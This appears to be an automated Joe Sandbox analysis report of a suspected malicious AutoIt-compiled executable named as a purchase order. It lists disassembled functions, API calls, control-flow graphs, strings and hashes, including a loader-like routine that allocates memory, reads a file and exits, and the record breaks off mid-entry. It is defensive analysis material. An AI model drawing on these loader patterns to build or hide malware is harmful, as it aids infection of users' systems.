                                                                                                              • Instruction Fuzzy Hash: D291D3716042149FDB11EB51D841F9BB3E8BF54304F40493EF9499B292DB38FA48CB96
                                                                                                              Function 003E3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 003E3F86
                                                                                                              • RegisterClassExW.USER32(00000030), ref: 003E3FB0
                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003E3FC1
                                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 003E3FDE
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003E3FEE
                                                                                                              • LoadIconW.USER32(000000A9), ref: 003E4004
                                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003E4013
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                              • API String ID: 2914291525-1005189915
                                                                                                              • Opcode ID: f1c33ee514ce7a7ab41b3e47925842b238be54640d89ac7604423ea7658be046
                                                                                                              • Instruction ID: 999611ca09890f9d2bcb969d9d4d419695e77350bf743dcee639edfb5159e4e2
                                                                                                              • Opcode Fuzzy Hash: f1c33ee514ce7a7ab41b3e47925842b238be54640d89ac7604423ea7658be046
                                                                                                              • Instruction Fuzzy Hash: 7621C5B5E00218AFDB00DFA5EC89BCDBFB4FB09705F04412AF615A62A0E7B545448F9A
                                                                                                              Function 0042BFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 0042BDB4: __time64.LIBCMT ref: 0042BDBE
                                                                                                                • Part of subcall function 003E4517: _fseek.LIBCMT ref: 003E452F
                                                                                                              • __wsplitpath.LIBCMT ref: 0042C083
                                                                                                                • Part of subcall function 00401DFC: __wsplitpath_helper.LIBCMT ref: 00401E3C
                                                                                                              • _wcscpy.LIBCMT ref: 0042C096
                                                                                                              • _wcscat.LIBCMT ref: 0042C0A9
                                                                                                              • __wsplitpath.LIBCMT ref: 0042C0CE
                                                                                                              • _wcscat.LIBCMT ref: 0042C0E4
                                                                                                              • _wcscat.LIBCMT ref: 0042C0F7
                                                                                                              • _wcscmp.LIBCMT ref: 0042C03E
                                                                                                                • Part of subcall function 0042C56D: _wcscmp.LIBCMT ref: 0042C65D
                                                                                                                • Part of subcall function 0042C56D: _wcscmp.LIBCMT ref: 0042C670
                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0042C2A1
                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0042C338
                                                                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0042C34E
                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0042C35F
                                                                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0042C371
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 2378138488-0
                                                                                                              • Opcode ID: 42baab75af72f281043de97a5bb2d2df80214d8894953ea24dd74c92b8acd4fa
                                                                                                              • Instruction ID: 64bfa6ec34809298d50669a82458e2d201cc04f8aba60ff6dec99fa596d502a1
                                                                                                              • Opcode Fuzzy Hash: 42baab75af72f281043de97a5bb2d2df80214d8894953ea24dd74c92b8acd4fa
                                                                                                              • Instruction Fuzzy Hash: 35C15BB1E00229ABDF11DF96DC81EDEB7BCAF48304F4040ABF609E6151DB749A848F65
                                                                                                              Function 003E3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 957 3e3742-3e3762 959 3e3764-3e3767 957->959 960 3e37c2-3e37c4 957->960 962 3e37c8 959->962 963 3e3769-3e3770 959->963 960->959 961 3e37c6 960->961 964 3e37ab-3e37b3 DefWindowProcW 961->964 965 3e37ce-3e37d1 962->965 966 451e00-451e2e call 3e2ff6 call 3fe312 962->966 967 3e382c-3e3834 PostQuitMessage 963->967 968 3e3776-3e377b 963->968 972 3e37b9-3e37bf 964->972 973 3e37f6-3e381d SetTimer RegisterWindowMessageW 965->973 974 3e37d3-3e37d4 965->974 1000 451e33-451e3a 966->1000 971 3e37f2-3e37f4 967->971 969 451e88-451e9c call 424ddd 968->969 970 3e3781-3e3783 968->970 969->971 994 451ea2 969->994 977 3e3789-3e378e 970->977 978 3e3836-3e3845 call 3feb83 970->978 971->972 973->971 979 3e381f-3e382a CreatePopupMenu 973->979 981 3e37da-3e37ed KillTimer call 3e3847 call 3e390f 974->981 982 451da3-451da6 974->982 984 451e6d-451e74 977->984 985 3e3794-3e3799 977->985 978->971 979->971 981->971 988 451ddc-451dfb MoveWindow 982->988 989 451da8-451daa 982->989 984->964 999 451e7a-451e83 call 41a5f3 984->999 992 3e379f-3e37a5 985->992 993 451e58-451e68 call 4255bd 985->993 988->971 996 451dac-451daf 989->996 997 451dcb-451dd7 SetFocus 989->997 992->964 992->1000 993->971 994->964 996->992 1001 451db5-451dc6 call 3e2ff6 996->1001 997->971 999->964 1000->964 1006 451e40-451e53 call 3e3847 call 3e4ffc 1000->1006 1001->971 1006->964
                                                                                                              APIs
                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 003E37B3
                                                                                                              • KillTimer.USER32(?,00000001), ref: 003E37DD
                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003E3800
                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003E380B
                                                                                                              • CreatePopupMenu.USER32 ref: 003E381F
                                                                                                              • PostQuitMessage.USER32(00000000), ref: 003E382E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                              • String ID: TaskbarCreated
                                                                                                              • API String ID: 129472671-2362178303
                                                                                                              • Opcode ID: ccbdc453575dec10d4993c3a7d0bec369232b0c1f5af0fd1828a5730cd454aea
                                                                                                              • Instruction ID: bca174efa76e374b71df74706ca2598f8a191c498eeb5cb9519d7dfa3615f640
                                                                                                              • Opcode Fuzzy Hash: ccbdc453575dec10d4993c3a7d0bec369232b0c1f5af0fd1828a5730cd454aea
                                                                                                              • Instruction Fuzzy Hash: E24169F56081F5ABDB165B6ADC4EB7A3A59FB01301F000336F912E79F1DB649E40872A
                                                                                                              Function 003E3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 003E3E79
                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 003E3E88
                                                                                                              • LoadIconW.USER32(00000063), ref: 003E3E9E
                                                                                                              • LoadIconW.USER32(000000A4), ref: 003E3EB0
                                                                                                              • LoadIconW.USER32(000000A2), ref: 003E3EC2
                                                                                                                • Part of subcall function 003E4024: LoadImageW.USER32(003E0000,00000063,00000001,00000010,00000010,00000000), ref: 003E4048
                                                                                                              • RegisterClassExW.USER32(?), ref: 003E3F30
                                                                                                                • Part of subcall function 003E3F53: GetSysColorBrush.USER32(0000000F), ref: 003E3F86
                                                                                                                • Part of subcall function 003E3F53: RegisterClassExW.USER32(00000030), ref: 003E3FB0
                                                                                                                • Part of subcall function 003E3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003E3FC1
                                                                                                                • Part of subcall function 003E3F53: InitCommonControlsEx.COMCTL32(?), ref: 003E3FDE
                                                                                                                • Part of subcall function 003E3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003E3FEE
                                                                                                                • Part of subcall function 003E3F53: LoadIconW.USER32(000000A9), ref: 003E4004
                                                                                                                • Part of subcall function 003E3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003E4013
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                              • String ID: #$0$AutoIt v3
                                                                                                              • API String ID: 423443420-4155596026
                                                                                                              • Opcode ID: 6d485580cd90e631e4caf8e83af83ca5594a0337a00cc80cd1d8731289750756
                                                                                                              • Instruction ID: c7fc292d4f38b8d939ffb4665cf3a856622b3b27dd8611a44d2964d2f41d5c1d
                                                                                                              • Opcode Fuzzy Hash: 6d485580cd90e631e4caf8e83af83ca5594a0337a00cc80cd1d8731289750756
                                                                                                              • Instruction Fuzzy Hash: A32162B4E04314ABCB01DFA9EC49A9ABFF5FB4D310F00423AE204A72B1D7B546408F99
                                                                                                              Function 00D785B0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1021 d785b0-d7865e 1023 d78665-d7868b call d794c0 CreateFileW 1021->1023 1026 d78692-d786a2 1023->1026 1027 d7868d 1023->1027 1035 d786a4 1026->1035 1036 d786a9-d786c3 VirtualAlloc 1026->1036 1028 d787dd-d787e1 1027->1028 1029 d78823-d78826 1028->1029 1030 d787e3-d787e7 1028->1030 1032 d78829-d78830 1029->1032 1033 d787f3-d787f7 1030->1033 1034 d787e9-d787ec 1030->1034 1037 d78885-d7889a 1032->1037 1038 d78832-d7883d 1032->1038 1039 d78807-d7880b 1033->1039 1040 d787f9-d78803 1033->1040 1034->1033 1035->1028 1041 d786c5 1036->1041 1042 d786ca-d786e1 ReadFile 1036->1042 1047 d7889c-d788a7 VirtualFree 1037->1047 1048 d788aa-d788b2 1037->1048 1045 d78841-d7884d 1038->1045 1046 d7883f 1038->1046 1049 d7880d-d78817 1039->1049 1050 d7881b 1039->1050 1040->1039 1041->1028 1043 d786e3 1042->1043 1044 d786e8-d78728 VirtualAlloc 1042->1044 1043->1028 1051 d7872f-d7874a call d79710 1044->1051 1052 d7872a 1044->1052 1053 d78861-d7886d 1045->1053 1054 d7884f-d7885f 1045->1054 1046->1037 1047->1048 1049->1050 1050->1029 1060 d78755-d7875f 1051->1060 1052->1028 1057 d7886f-d78878 1053->1057 1058 d7887a-d78880 1053->1058 1056 d78883 1054->1056 1056->1032 1057->1056 1058->1056 1061 d78792-d787a6 call d79520 1060->1061 1062 d78761-d78790 call d79710 1060->1062 1068 d787aa-d787ae 1061->1068 1069 d787a8 1061->1069 1062->1060 1070 d787b0-d787b4 CloseHandle 1068->1070 1071 d787ba-d787be 1068->1071 1069->1028 1070->1071 1072 d787c0-d787cb VirtualFree 1071->1072 1073 d787ce-d787d7 1071->1073 1072->1073 1073->1023 1073->1028
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D78681
                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D788A7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2063345059.0000000000D76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D76000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_d76000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFileFreeVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 204039940-0
                                                                                                              • Opcode ID: 82da6562ea58e1e6a493f370b5b44df79f1e69436ef7e6b8db348b6991eb573a
                                                                                                              • Instruction ID: be5a4fcca6f4cbf9766182dc817bc59681b9926e4e54ec3f894ca12b32d8fee7
                                                                                                              • Opcode Fuzzy Hash: 82da6562ea58e1e6a493f370b5b44df79f1e69436ef7e6b8db348b6991eb573a
                                                                                                              • Instruction Fuzzy Hash: 06A12D74E40209EBDB14CFA4C898BEEBBB5FF48304F248159E115BB280DB759A41DFA5
                                                                                                              Function 003E49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1129 3e49fb-3e4a25 call 3ebcce RegOpenKeyExW 1132 3e4a2b-3e4a2f 1129->1132 1133 4541cc-4541e3 RegQueryValueExW 1129->1133 1134 4541e5-454222 call 3ff4ea call 3e47b7 RegQueryValueExW 1133->1134 1135 454246-45424f RegCloseKey 1133->1135 1140 454224-45423b call 3e6a63 1134->1140 1141 45423d-454245 call 3e47e2 1134->1141 1140->1141 1141->1135
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 003E4A1D
                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004541DB
                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0045421A
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00454249
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue$CloseOpen
                                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                              • API String ID: 1586453840-614718249
                                                                                                              • Opcode ID: 7a3bbf183740324a6aaf23959ec8b712b89aada29eecba882f15324eb92971f9
                                                                                                              • Instruction ID: 88b4c7d71637551247635cf78b650aa52aee70e4606c7507c91629e31b21906b
                                                                                                              • Opcode Fuzzy Hash: 7a3bbf183740324a6aaf23959ec8b712b89aada29eecba882f15324eb92971f9
                                                                                                              • Instruction Fuzzy Hash: 99116D71A00118BEEB01ABA4CD86EFF7BBCEF04358F104069F506D6191EA749E45DB54
                                                                                                              Function 003E36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1156 3e36b8-3e3728 CreateWindowExW * 2 ShowWindow * 2
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003E36E6
                                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003E3707
                                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,003E3AA3,?), ref: 003E371B
                                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,003E3AA3,?), ref: 003E3724
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CreateShow
                                                                                                              • String ID: AutoIt v3$edit
                                                                                                              • API String ID: 1584632944-3779509399
                                                                                                              • Opcode ID: 60a9fa4a5b945901ed37ac037668e198766777ee3b795ab1966d8689bbbce163
                                                                                                              • Instruction ID: b4304d23f78a1c7e56b5565ed5ed98a2828c6108f475fa27796c4d657fdf80d3
                                                                                                              • Opcode Fuzzy Hash: 60a9fa4a5b945901ed37ac037668e198766777ee3b795ab1966d8689bbbce163
                                                                                                              • Instruction Fuzzy Hash: D8F0DA71A482E07AE7315757AC48E673E7DEBC7F20F00402FFA08A25B0D6650895DAB9
                                                                                                              Function 00D78350 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156fileCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1261 d78350-d784ae call d78240 CreateFileW 1267 d784b5-d784c5 1261->1267 1268 d784b0 1261->1268 1271 d784c7 1267->1271 1272 d784cc-d784e6 VirtualAlloc 1267->1272 1269 d78565-d7856a 1268->1269 1271->1269 1273 d784ea-d78501 ReadFile 1272->1273 1274 d784e8 1272->1274 1275 d78505-d7853f call d78280 call d77240 1273->1275 1276 d78503 1273->1276 1274->1269 1281 d78541-d78556 call d782d0 1275->1281 1282 d7855b-d78563 ExitProcess 1275->1282 1276->1269 1281->1282 1282->1269
                                                                                                              APIs
                                                                                                                • Part of subcall function 00D78240: Sleep.KERNELBASE(000001F4), ref: 00D78251
                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D784A4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2063345059.0000000000D76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D76000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_d76000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFileSleep
                                                                                                              • String ID: YYIACMSJTEUBL1B3AF17QR
                                                                                                              • API String ID: 2694422964-3274283272
                                                                                                              • Opcode ID: 1ab6724357998d6cbfb880048ecdbbbbf36b50f31c725e11b999389b61cdc8f0
                                                                                                              • Instruction ID: 23ebb4acda9bc37b2208527ffcbf6d1ff13e119a7b16b55a97501da733c54303
                                                                                                              • Opcode Fuzzy Hash: 1ab6724357998d6cbfb880048ecdbbbbf36b50f31c725e11b999389b61cdc8f0
                                                                                                              • Instruction Fuzzy Hash: AF619330D04248DAEF11DBF4D848BEEBB75AF19304F144199E249BB2C1DABA5B44CBB5
                                                                                                              Function 003E4A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 003E5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004A1148,?,003E61FF,?,00000000,00000001,00000000), ref: 003E5392
                                                                                                                • Part of subcall function 003E49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 003E4A1D
                                                                                                              • _wcscat.LIBCMT ref: 00452D80
                                                                                                              • _wcscat.LIBCMT ref: 00452DB5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcscat$FileModuleNameOpen
                                                                                                              • String ID: 8!J$\$\Include\
                                                                                                              • API String ID: 3592542968-4002809495
                                                                                                              • Opcode ID: 1af749cc03b1d5154051bb787ebc6252170975090a8e369344190c70ffcadb61
                                                                                                              • Instruction ID: 83d057fd7bf0ec62d8d2e130b6c98d305d619e3603d3cf542a157460a1d1a6b4
                                                                                                              • Opcode Fuzzy Hash: 1af749cc03b1d5154051bb787ebc6252170975090a8e369344190c70ffcadb61
                                                                                                              • Instruction Fuzzy Hash: E251A5714143908FC705EF5ADA8189BBBF4FF5A300B40453FF649972A1EBB49508DB5A
                                                                                                              Function 003E4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003E39FE,?,00000001), ref: 003E41DB
                                                                                                              • _free.LIBCMT ref: 004536B7
                                                                                                              • _free.LIBCMT ref: 004536FE
                                                                                                                • Part of subcall function 003EC833: __wsplitpath.LIBCMT ref: 003EC93E
                                                                                                                • Part of subcall function 003EC833: _wcscpy.LIBCMT ref: 003EC953
                                                                                                                • Part of subcall function 003EC833: _wcscat.LIBCMT ref: 003EC968
                                                                                                                • Part of subcall function 003EC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 003EC978
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                              • API String ID: 805182592-1757145024
                                                                                                              • Opcode ID: 6ba411a27ec193a9a23a8a3481b06fc0cb3d3f8ff2f8bcde771dc7fc8f6fa74f
                                                                                                              • Instruction ID: 3afaf3a71a712893630be1b00d166f93466d48e129b953e3bbbac952e048240c
                                                                                                              • Opcode Fuzzy Hash: 6ba411a27ec193a9a23a8a3481b06fc0cb3d3f8ff2f8bcde771dc7fc8f6fa74f
                                                                                                              • Instruction Fuzzy Hash: BC91C331910269AFCF05EFA5CC519EEB7B4BF08351F10452EF816AB292DB38AA05CB54
                                                                                                              Function 003E40E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 00453725
                                                                                                              • GetOpenFileNameW.COMDLG32 ref: 0045376F
                                                                                                                • Part of subcall function 003E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003E53B1,?,?,003E61FF,?,00000000,00000001,00000000), ref: 003E662F
                                                                                                                • Part of subcall function 003E40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003E40C6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
